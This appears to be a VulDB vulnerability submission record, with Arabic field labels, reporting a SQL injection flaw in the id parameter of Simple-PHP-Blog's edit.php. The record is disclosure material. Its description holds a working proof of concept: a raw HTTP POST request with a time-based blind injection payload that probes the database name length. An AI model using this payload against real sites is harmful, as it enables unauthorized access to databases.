| عنوان | Philip Okugbe Simple-PHP-Blog v1.0 SQL Injection |
|---|
| الوصف | Download and set up this PHP system from https://github.com/Philipinho/Simple-PHP-Blog. Then, in the edit.php file, you will notice that the id parameter is not filtered or forcibly type-casted, which makes it possible for SQL injection attacks.
POC:
POST /edit.php HTTP/1.1
Host: xxxxxxx
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Edg/x.x.x.x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=lib8291dc1lcn1lh4nrg2d1nti
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 130
upd=1&id=1+OR+if(length(database())=12,sleep(2),exp(710))--&title=InjectedTitle&description=InjectedDescription&slug=injected-slug
Using this POC, SQL injection and time delay injection can be employed to inject into the length of the database. The duration of the delay is three times the value of 'x' in 'sleep(x)'. |
|---|
| المصدر | ⚠️ https://github.com/woshinenbaba/CVE-/issues/1 |
|---|
| المستخدم | xiaofeifei (UID 92996) |
|---|
| ارسال | 26/11/2025 12:35 PM (5 أشهر منذ) |
|---|
| الاعتدال | 07/12/2025 06:51 PM (11 days later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 334669 [Philipinho Simple-PHP-Blog حتى 94b5d3e57308bce5dfbc44c3edafa9811893d958 /edit.php حقن SQL] |
|---|
| النقاط | 20 |
|---|